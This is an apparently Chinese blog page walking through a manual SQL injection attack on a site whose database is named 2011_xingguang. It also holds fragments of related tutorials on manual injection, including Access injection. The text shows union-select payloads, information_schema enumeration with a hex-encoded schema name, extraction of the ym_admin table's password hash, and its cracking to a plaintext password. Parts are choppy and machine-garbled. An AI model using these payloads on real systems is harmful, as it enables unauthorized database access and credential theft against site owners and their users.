這一節沒有什麼用,就是用來熟悉命令的2.聯合查詢,判斷可回顯資料位置,結果,可回顯位置為2,9,14目標:1.order by 18-- 訂購18-- //**存在18個表
3.user()檢視當前使用者,version()檢視版本,database()檢視庫名
當前使用者為root使用者具有最高許可權當前資料庫為2011_xingguang
4.檢視管理表and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,
from information_schema.tables where table_schema=0x323031315f78696e676775616e67table_schema=庫名的16進製制
這裡我們看到當前表名為ym_admin
5.檢視admin表列名
仍然是後面新增limit 逐個檢視,的到0--7列名為aid,userid uname pwd usertype email addtime addip
4.爆破管理員賬戶密碼
從ym_admin中選擇1,pwd,3,4,5,6,7,8,userid,10,11,12,13,14,15,16,17,18--爆管理員賬戶密碼
b7a782741f667201b54880c925faec4b可以看出來是32位,採用md5加密,我們解密,密碼10000常見管理表命名方式:關鍵字系統登入使用者admin
config.asp裡db.asp
con.asp
config.php檔案
sql注入 手工注入
表示式 描述union 將查詢結果進行聯合輸出,追加在列尾 union all load 檔案讀取 into outfile 檔案寫入 datadir 資料庫檔案存放路徑 user 當前使用者 version 資料庫版本 database 資料庫名稱 表示系統變數 資料庫 表名描述 informat...
SQL注入(手工篇)
開發人員在開發web系統時對輸入的資料沒有進行有效的驗證及過濾,就存在引發sql注入漏洞的可能,並導致檢視 插入 刪除資料庫的資料,甚至可以執行主機系統命令。1.可能出現asp?id x的 2.漏洞測試 1 單引號測試 在頁面中執行命令時使用成對單引號和單個單引號進行測試,檢視是否有sql注入 2 ...
SQL注入之Access注入 (手工)
尋找注入點 首先呢,在 中尋找傳遞引數的頁面,也就是尋找注入點。判斷注入 找到頁面 注入點 之後呢,我們需要判斷當前頁面是否存在注入 傳統的方法是 語句狀態 鏈結後面加 報錯and 1 1 正常and 1 2 報錯or 1 2 正常or 1 1 報錯或者跳轉到另外乙個頁面 我們不使用傳統的方法,因為...